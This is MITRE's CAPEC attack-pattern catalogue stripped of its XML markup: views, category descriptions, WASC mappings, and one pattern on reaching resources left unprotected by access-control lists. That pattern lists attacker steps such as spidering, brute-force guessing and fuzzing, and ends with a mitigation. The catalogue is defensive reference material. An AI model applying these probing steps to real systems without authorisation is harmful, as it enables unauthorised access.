Graph
This view organizes attack patterns hierarchically based on mechanisms that are frequently employed when exploiting a vulnerability.
1000
Category
HasMember
118
1000
Category
HasMember
119
1000
Category
HasMember
152
1000
Category
HasMember
156
1000
Category
HasMember
172
1000
Category
HasMember
210
1000
Category
HasMember
223
1000
Category
HasMember
225
1000
Category
HasMember
232
1000
Category
HasMember
255
1000
Category
HasMember
262
1000
Category
HasMember
281
1000
Category
HasMember
525
1000
Category
HasMember
526
1000
Category
HasMember
436
1000
Category
HasMember
527
CAPEC Content Team
The MITRE Corporation
2014-06-23
Implicit_Slice
This view (slice) covers all the elements in CAPEC.
true()
CAPEC Content Team
The MITRE Corporation
2014-06-23
Implicit_Slice
This view (slice) covers meta abstraction attack patterns.
.//@Pattern_Abstraction='Meta'
CAPEC Content Team
The MITRE Corporation
2014-06-23
Implicit_Slice
This view (slice) covers standard abstraction attack patterns.
.//@Pattern_Abstraction='Standard'
CAPEC Content Team
The MITRE Corporation
2014-06-23
Implicit_Slice
This view (slice) covers detailed abstraction attack patterns.
.//@Pattern_Abstraction='Detailed'
CAPEC Content Team
The MITRE Corporation
2014-06-23
Graph
This view organizes attack patterns hierarchically based on the attack domain.
3000
Category
HasMember
513
3000
Category
HasMember
515
3000
Category
HasMember
512
3000
Category
HasMember
437
3000
Category
HasMember
403
3000
Category
HasMember
514
CAPEC Content Team
The MITRE Corporation
2014-06-23
Explicit_Slice
CAPEC nodes in this view (graph) are associated with the WASC Threat Classification 2.0.
333
Category
HasMember
336
333
Category
HasMember
338
333
Category
HasMember
339
333
Category
HasMember
340
333
Category
HasMember
341
333
Category
HasMember
342
333
Category
HasMember
343
333
Category
HasMember
344
333
Category
HasMember
345
333
Category
HasMember
351
333
Category
HasMember
352
333
Category
HasMember
356
333
Category
HasMember
357
333
Category
HasMember
358
333
Category
HasMember
359
333
Category
HasMember
360
333
Category
HasMember
361
333
Category
HasMember
362
333
Category
HasMember
363
333
Category
HasMember
364
333
Category
HasMember
365
333
Category
HasMember
366
333
Category
HasMember
367
333
Category
HasMember
368
333
Category
HasMember
369
333
Category
HasMember
370
333
Category
HasMember
371
333
Category
HasMember
372
333
Category
HasMember
374
333
Category
HasMember
375
333
Category
HasMember
376
333
Category
HasMember
377
333
Category
HasMember
378
333
Category
HasMember
379
CAPEC Content Team
The MITRE Corporation
2014-06-23
Implicit_Slice
CAPEC nodes in this view (slice) have been deprecated.
.//@Status='Deprecated'
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the gathering, collection, and theft of information by an adversary. The adversary may collect this information through a variety of methods including active querying as well as passive observation. By exploiting weaknesses in the design or configuration of the target and its communications, an adversary is able to get the target to reveal more information than intended. Information retrieved may aid the adversary in making inferences about potential weaknesses, vulnerabilities, or techniques that assist the adversary's objectives. This information may include details regarding the configuration or capabilities of the target, clues as to the timing or nature of activities, or otherwise sensitive information. Often this sort of attack is undertaken in preparation for some other type of attack, although the collection of information by itself may in some cases be the end goal of the adversary.
1000
Attack Pattern
HasMember
116
1000
Attack Pattern
HasMember
117
1000
Attack Pattern
HasMember
169
1000
Attack Pattern
HasMember
224
1000
Attack Pattern
HasMember
404
1000
Attack Pattern
HasMember
410
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the depletion of a resource to the point that the target's functionality is affected. Virtually any resource necessary for the target's operation can be targeted in this attack. The result of a successful resource depletion attack is usually the degrading or denial of one or more services offered by the target. Resources required will depend on the nature of the resource being depleted, the amount of resources the target has access to, and other mitigating circumstances such as the target's ability to shift load or acquire additional resources to deal with the depletion. The more protected the resource and the greater the quantity of it that must be consumed, the more skill the adversary will need to successfully execute attacks in this category.
404
Targeted
770
Targeted
The target must rely on a vulnerable resource for its operations and be unable to replace it in a reasonable amount of time if it is unavailable.
The attacker must have the ability to consume, destroy, or disrupt a resource required for normal operation of the target.
In order to deplete the target's resources the attacker must interact with the target in a programmatic way. Depending on the nature of the resource the attacker may need a client or script capable of making repeated requests over a network, or the ability to craft specific requests, such as an HTTP request containing thousands of slashes. If the attacker has some privileges on the system the required resource will likely be the ability to run a binary or upload a compiled exploit, or write and execute a script or program that consumes resources. Depending on the defenses of the targeted system, the attacker may need access to extensive computational and network resources in order to overwhelm the target.
1000
Attack Pattern
HasMember
125
1000
Attack Pattern
HasMember
130
1000
Attack Pattern
HasMember
131
1000
Attack Pattern
HasMember
227
1000
Attack Pattern
HasMember
490
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the ability to control or disrupt the behavior of an target through crafted input data submitted using an interface functioning to process data input. This happens when an adversary adds material to their input that is interpreted by the application causing the targeted application to perform steps unintended by the application manager or causing the application to enter an unstable state. Attacks of this type differ from Data Structure Attacks in that the latter attacks subvert the underlying structures that hold user-provided data, either pre-empting interpretation of the input (in the case of Buffer Overflows) or resulting in values that the targeted application is unable to handle correctly (in the case of Integer Overflows). In Injection attacks, the input is interpreted by the application, but the attacker has included instructions to the interpreting functions that the target application then follows.
1000
Attack Pattern
HasMember
137
1000
Attack Pattern
HasMember
175
1000
Attack Pattern
HasMember
240
1000
Attack Pattern
HasMember
242
1000
Attack Pattern
HasMember
248
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on malicious interactions with a target in an attempt to deceive the target and convince the target that it is interacting with some other principal and as such take actions based on the level of trust that exists between the target and the other principal. These types of attacks assume that some piece of content or functionality is associated with an identity and that the content / functionality is trusted by the target because of this association. Often identified by the term "spoofing", these types of attacks rely on the falsification of the content and/or identity in such a way that the target will incorrectly trust the legitimacy of the content. For example, an attacker may modify a financial transaction between two parties so that the participants remain unchanged but the amount of the transaction is increased. If the recipient cannot detect the change, they may incorrectly assume the modified message originated with the original sender. Attacks of these type may involve an adversary crafting the content from scratch or capturing and modifying legitimate content.
1000
Attack Pattern
HasMember
126
1000
Attack Pattern
HasMember
148
1000
Attack Pattern
HasMember
151
1000
Attack Pattern
HasMember
154
1000
Attack Pattern
HasMember
173
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker exploits weaknesses in timing or state maintaining functions to perform actions that would otherwise be prevented by the execution flow of the target code and processes. An example of a state attack might include manipulation of an application's information to change the apparent credentials or similar information, possibly allowing the application to access material it would not normally be allowed to access. A common example of a timing attack is a test-action race condition where some state information is tested and, if it passes, an action is performed. If the attacker can change the state between the time that the application performs the test and the time the action is performed, then they might be able to manipulate the outcome of the action to malicious ends.
665
Targeted
Virtually all applications can be subject to time or state attacks in some form.
State attacks require the ability to manipulate the underlying state of an application. If that state is stored in a simple file, this can be relatively easy. If the state is stored internally, this can be more difficult. Timing attacks rely on being able to control when an application's thread is interrupted in order to insert the malicious action. Even then, if the actions in the sequence happen quickly, then success can largely be a matter of luck. As such, having many opportunities to attempt the attack is usually a requirement since and individual attack may have a low probability of success.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates one or more functions of an application in order to perform an attack. This is a broad class of attacks wherein the attacker is able to alter the intended result or purpose of the functionality and thereby affect application behavior or information integrity. Outcomes can range from vandalism and reduction in service to the execution of arbitrary code on the target machine.
All applications are potentially vulnerable to this class of attack as all applications have by nature, intended functionality.
Attacker requirements will vary depending on the nature of the functionality to be manipulated.
1000
Attack Pattern
HasMember
212
333
Category
HasMember
375
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker utilizes probabilistic techniques to explore and overcome security properties of the target that are based on an assumption of strength due to the extremely low mathematical probability that an attacker would be able to identify and exploit the very rare specific conditions under which those security properties do not hold.
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker actively targets exploitation of weaknesses, limitations and assumptions in the mechanisms a target utilizes to manage identity and authentication. Such exploitation can lead to the complete subversion of any trust the target system may have in the identity of any entity with which it interacts. Weaknesses targeted by these sorts of attacks are often due to assumptions and overconfidence in the strength or rigor of the implemented authentication mechanisms.
306
Targeted
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker actively targets exploitation of weaknesses, limitations and assumptions in the mechanisms a target utilizes to manage access to its resources or authorize utilization of its functionality. Such exploitation can lead to the complete subversion of any control the target has over its data or functionality enabling almost any desired action on the part of the attacker. Weaknesses targeted by these sorts of attacks are often due to three primary factors: 1) a fundamental dependence on authentication mechanisms being effective; 2) a lack of effective control over the separation of privilege between various entities; and 3) assumptions and overconfidence in the strength or rigor of the implemented authorization mechanisms.
79
Targeted
732
Targeted
807
Targeted
CAPEC Content Team
The MITRE Corporation
2014-06-23
1000
Category
ChildOf
232
CAPEC Content Team
The MITRE Corporation
2014-06-23
An attacker manipulates and exploits characteristics of system data structures in order to violate the intended usage and protections of these structures. This is done in such a way that yields either improper access to the associated system data or violations of the security properties of the system itself due to vulnerabilities in how the system processes and manages the data structures. Often, vulnerabilities and therefore exploitability of these data structures exist due to ambiguity and assumption in their design and prescribed handling.
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the adversary's ability to manipulate one or more resources, or some attribute thereof, in order to perform an attack. This is a broad class of attacks wherein the attacker is able to change some aspect of a resource's state and thereby affect application behavior or information integrity. Examples of resources include files, applications, libraries, infrastructure, and configuration information. Outcomes can range from vandalism and reduction in service to the execution of arbitrary code on the target machine.
1000
Attack Pattern
HasMember
154
1000
Attack Pattern
HasMember
176
1000
Attack Pattern
HasMember
272
1000
Attack Pattern
HasMember
548
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the analysis of a target system, protocol, message, or application in order to overcome protections on the target or as a precursor to other attacks. Analysis can involve dissection of an application, analysis of message patterns, formal analysis of protocols, or other methods. The outcome of these attacks can be disclosure of sensitive information, or disclosure of security configuration that leads to further attacks targeted to discovered weaknesses.
Any entity that can be observed by an attacker could potentially be used in an analysis based attack.
Most analysis attacks require tools in order to collect information about the target. For example, scanning suites and packet sniffers might be used to analyze a web service or protocol. Moreover, following collection of information, some attacks require additional tools in order to process the discovered data. Cryptanalysis applications are one example of such tools. Finally, some of these attacks require a high level of sophistication on the part of an attacker in order to extract useful results from collected information.
When possible, minimize the information a system displays about itself, including minimizing unnecessary information in error messages and other descriptive messages.
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on operations to gather information about a target. Reconnaissance techniques can range from stealthy to noisy and utilize different tools and methods depending upon the scope of the reconnaissance. Some techniques may target single hosts while others are used against entire network address ranges, such as a CIDR class C or B network.
4000
Attack Pattern
HasMember
169
4000
Attack Pattern
HasMember
224
4000
Attack Pattern
HasMember
404
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Insufficient Authentication
WASC Threat Classification 2.0
WASC-01 - Insufficient Authentication
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Insufficient-Authentication
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Insufficient Authorization
WASC Threat Classification 2.0
WASC-02 - Insufficient Authorization
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Insufficient-Authorization
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Integer Overflows
333
Attack Pattern
HasMember
92
WASC Threat Classification 2.0
WASC-03 - Integer Overflows
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Integer-Overflows
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Insufficient Transport Layer Protection
WASC Threat Classification 2.0
WASC-04 - Insufficient Transport Layer Protection
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Insufficient-Transport-Layer-Protection
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Remote File Inclusion
333
Attack Pattern
HasMember
253
WASC Threat Classification 2.0
WASC-05 - Remote File Inclusion
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Remote-File-Inclusion
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Format String
WASC Threat Classification 2.0
WASC-06 - Format String
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Format-String
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Buffer Overflow
WASC Threat Classification 2.0
WASC-07 - Buffer Overflow
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Buffer-Overflow
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Cross-Site Scripting
WASC Threat Classification 2.0
WASC-08 - Cross-Site Scripting
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Cross-Site-Scripting
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Cross-Site Request Forgery
WASC Threat Classification 2.0
WASC-09 - Cross-Site Request Forgery
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Cross-Site-Request-Forgery
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Denial of Service
333
Category
HasMember
119
WASC Threat Classification 2.0
WASC-10 - Denial of Service
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Denial-of-Service
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Brute Force
WASC Threat Classification 2.0
WASC-11 - Brute Force
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Brute-Force
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Content Spoofing
WASC Threat Classification 2.0
WASC-12 - Content Spoofing
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Content-Spoofing
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Information Leakage
WASC Threat Classification 2.0
WASC-13 - Information Leakage
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Information-Leakage
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Server Misconfiguration
WASC Threat Classification 2.0
WASC-14 - Server Misconfiguration
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Server-Misconfiguration
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Application Misconfiguration
WASC Threat Classification 2.0
WASC-15 - Application Misconfiguration
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Application-Misconfiguration
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Directory Indexing
WASC Threat Classification 2.0
WASC-16 - Directory Indexing
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Directory-Indexing
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Improper Filesystem Permissions
WASC Threat Classification 2.0
WASC-17 - Improper Filesystem Permissions
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Improper-Filesystem-Permissions
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Credential/Session Prediction
WASC Threat Classification 2.0
WASC-18 - Credential/Session Prediction
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Credential-and-Session-Prediction
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item SQL Injection
333
Attack Pattern
HasMember
66
WASC Threat Classification 2.0
WASC-19 - SQL Injection
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/SQL-Injection
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Improper Input Handling
WASC Threat Classification 2.0
WASC-20 - Improper Input Handling
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Improper-Input-Handling
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Insufficient Anti-automation
WASC Threat Classification 2.0
WASC-21 - Insufficient Anti-automation
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Insufficient+Anti-automation
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Improper Output Handling
WASC Threat Classification 2.0
WASC-22 - Improper Output Handling
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Improper-Output-Handling
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item XML Injection
333
Attack Pattern
HasMember
250
WASC Threat Classification 2.0
WASC-23 - XML Injection
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/XML-Injection
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item HTTP Request Splitting
WASC Threat Classification 2.0
WASC-24 - HTTP Request Splitting
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/HTTP-Request-Splitting
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item HTTP Response Splitting
WASC Threat Classification 2.0
WASC-25 - HTTP Response Splitting
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/HTTP-Response-Splitting
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item HTTP Request Smuggling
WASC Threat Classification 2.0
WASC-26 - HTTP Request Smuggling
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/HTTP-Request-Smuggling
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item HTTP Response Smuggling
WASC Threat Classification 2.0
WASC-27 - HTTP Response Smuggling
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/HTTP-Response-Smuggling
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Null Byte Injection
WASC Threat Classification 2.0
WASC-28 - Null Byte Injection
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Null-Byte-Injection
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item LDAP Injection
1000
Attack Pattern
HasMember
136
WASC Threat Classification 2.0
WASC-29 - LDAP Injection
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/LDAP-Injection
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Mail Command Injection
WASC Threat Classification 2.0
WASC-30 - Mail Command Injection
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Mail-Command-Injection
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item OS Commanding
333
Attack Pattern
HasMember
88
WASC Threat Classification 2.0
WASC-31 - OS Commanding
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/OS-Commanding
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Routing Detour
WASC Threat Classification 2.0
WASC-32 - Routing Detour
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Routing-Detour
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Path Traversal
333
Attack Pattern
HasMember
126
WASC Threat Classification 2.0
WASC-33 - Path Traversal
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Path-Traversal
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Predictable Resource Location
WASC Threat Classification 2.0
WASC-34 - Predictable Resource Location
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Predictable-Resource-Location
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item SOAP Array Abuse
WASC Threat Classification 2.0
WASC-35 - SOAP Array Abuse
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/SOAP-Array-Abuse
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item SSI Injection
333
Attack Pattern
HasMember
101
WASC Threat Classification 2.0
WASC-36 - SSI Injection
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/SSI-Injection
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Session Fixation
WASC Threat Classification 2.0
WASC-37 - Session Fixation
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Session-Fixation
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item URL Redirector Abuse
WASC Threat Classification 2.0
WASC-38 - URL Redirector Abuse
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/URL-Redirector-Abuse
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item XPath Injection
333
Attack Pattern
HasMember
83
WASC Threat Classification 2.0
WASC-39 - XPath Injection
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/XPath-Injection
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Insufficient Process Validation
WASC Threat Classification 2.0
WASC-40 - Insufficient Process Validation
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Insufficient-Process-Validation
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item XML Attribute Blowup
WASC Threat Classification 2.0
WASC-41 - XML Attribute Blowup
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/XML-Attribute-Blowup
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Abuse of Functionality
WASC Threat Classification 2.0
WASC-42 - Abuse of Functionality
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Abuse-of-Functionality
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item XML External Entities
WASC Threat Classification 2.0
WASC-43 - XML External Entities
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/XML-External-Entities
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item XML Entity Expansion
333
Attack Pattern
HasMember
197
WASC Threat Classification 2.0
WASC-44 - XML Entity Expansion
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/XML-Entity-Expansion
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Fingerprinting
WASC Threat Classification 2.0
WASC-45 - Fingerprinting
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Fingerprinting
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item XQuery Injection
333
Attack Pattern
HasMember
84
WASC Threat Classification 2.0
WASC-46 - XQuery Injection
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/XQuery-Injection
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Insufficient Session Expiration
WASC Threat Classification 2.0
WASC-47 - Insufficient Session Expiration
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Insufficient-Session-Expiration
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Insecure Indexing
WASC Threat Classification 2.0
WASC-48 - Insecure Indexing
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Insecure-Indexing
CAPEC Content Team
The MITRE Corporation
2014-06-23
This category is related to the WASC Threat Classification 2.0 item Insufficient Password Recovery
WASC Threat Classification 2.0
WASC-49 - Insufficient Password Recovery
The Web Application Security Consortium (WASC)
2010
http://projects.webappsec.org/Insufficient-Password-Recovery
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the manipulation and exploitation of people. The techniques defined by each pattern are used to convince someone into performing actions or divulging confidential information, often resulting in access to computer systems or facilities. While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access. In most cases the adversary never comes face-to-face with the victim.
3000
Attack Pattern
HasMember
404
3000
Attack Pattern
HasMember
410
3000
Attack Pattern
HasMember
416
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on gaining physical access to a system or device. The techniques defined by each pattern are used to exploit weaknesses that enable an adversary to achieve physical access.
1000
Attack Pattern
HasMember
390
1000
Attack Pattern
HasMember
507
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the disruption of the supply chain lifecycle by manipulating computer system hardware, software, or services for the purpose of espionage, theft of critical data or technology, or the disruption of mission-critical operations or infrastructure. Supply chain operations are usually multi-national with parts, components, assembly, and delivery occurring across multiple countries offering an attacker multiple points for disruption.
3000
Attack Pattern
HasMember
438
3000
Attack Pattern
HasMember
439
3000
Attack Pattern
HasMember
440
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the exploitation of communications and related protocols. The techniques defined by each pattern are used by an adversary to block, manipulate, and steal communications in an attempt to achieve a desired negative technical impact.
3000
Attack Pattern
HasMember
272
3000
Attack Pattern
HasMember
117
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the exploitation of software applications. The techniques defined by each pattern are used to exploit these weaknesses in the application's design or implementation in an attempt to achieve a desired negative technical impact.
3000
Attack Pattern
HasMember
112
3000
Attack Pattern
HasMember
114
3000
Attack Pattern
HasMember
115
3000
Attack Pattern
HasMember
116
3000
Attack Pattern
HasMember
123
3000
Attack Pattern
HasMember
125
3000
Attack Pattern
HasMember
126
3000
Attack Pattern
HasMember
128
3000
Attack Pattern
HasMember
129
3000
Attack Pattern
HasMember
130
3000
Attack Pattern
HasMember
131
3000
Attack Pattern
HasMember
137
3000
Attack Pattern
HasMember
148
3000
Attack Pattern
HasMember
151
3000
Attack Pattern
HasMember
154
3000
Attack Pattern
HasMember
169
3000
Attack Pattern
HasMember
173
3000
Attack Pattern
HasMember
175
3000
Attack Pattern
HasMember
188
3000
Attack Pattern
HasMember
224
3000
Attack Pattern
HasMember
227
3000
Attack Pattern
HasMember
131
3000
Attack Pattern
HasMember
212
3000
Attack Pattern
HasMember
242
3000
Attack Pattern
HasMember
248
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on physical security. The techniques defined by each pattern are used to exploit weaknesses in the physical security of a system in an attempt to achieve a desired negative technical impact.
3000
Attack Pattern
HasMember
390
3000
Attack Pattern
HasMember
507
3000
Attack Pattern
HasMember
547
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the exploitation of the physical hardware used in computing systems. The techniques defined by each pattern reflect the replacement, destruction and general modification of components that make up a system in an attempt to achieve a desired negative technical impact.
3000
Attack Pattern
HasMember
169
3000
Attack Pattern
HasMember
401
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the use of malicious code to achieve a desired negative technical impact. These pattern are often used in conjunction with other patterns to fully exploit a vulnerable system.
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on alteration or manipulation of the components in a system in an attempt to achieve a desired negative technical impact.
1000
Attack Pattern
HasMember
401
1000
Attack Pattern
HasMember
441
1000
Attack Pattern
HasMember
547
CAPEC Content Team
The MITRE Corporation
2014-06-23
Attack patterns within this category focus on the manipulation of a user in an attempt to achieve a desired negative technical impact.
1000
Attack Pattern
HasMember
416
CAPEC Content Team
The MITRE Corporation
2014-06-23
In applications, particularly web applications, access to functionality is mitigated by the authorization framework, whose job it is to map ACLs to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application or can run queries for data that he is otherwise not supposed to.
Survey
The attacker surveys the target application, possibly as a valid and authenticated user
Spidering web sites for all available links
env-Web
Brute force guessing of resource names
env-All
Brute force guessing of user names / credentials
env-All
Brute force guessing of function names / actions
env-All
ACLs or other access control mechanisms are present in the software
env-Web env-ClientServer
User IDs or other credentials are present in the software
env-Web env-ClientServer
Operating modes with different privileges are present in the software
env-ClientServer env-Local env-Embedded
Identify Functionality
At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions
Use the web inventory of all forms and inputs and apply attack data to those inputs.
env-Web
Use a packet sniffer to capture and record network traffic
env-CommProtocol
Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment.
env-Local env-Embedded
The attacker produces a list of functionality or data that can be accessed through the system.
Iterate over access capabilities
Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs.
Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters)
env-Web env-Local env-Embedded env-ClientServer
Attempts to create a catalog of access mechanisms and data have failed.
env-All
Functionality is accessible to unauthorized users.
The application must be navigable in a manner that associates elements (subsections) of the application with ACLs.
The various resources, or individual URLs, must be somehow discoverable by the attacker
The administrator must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource.
High
Very High
Analysis
Brute Force
Implementing the Model-View-Controller (MVC) within Java EE's Servlet paradigm using a "Single front controller" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.
If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted.
Low
In order to discover unrestricted resources, the attacker does not need special tools or skills. He only has to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly.
No special resources are required for the exploit of this pattern.
In the case of web applications, use of a spider or other crawling software can allow an attacker to search for accessible pages not beholden to a security constraint.
More generally, noting the target resource accessed upon performing specific actions drives an understanding of the resources accessible from the current context.
In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as "NoAccess", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.
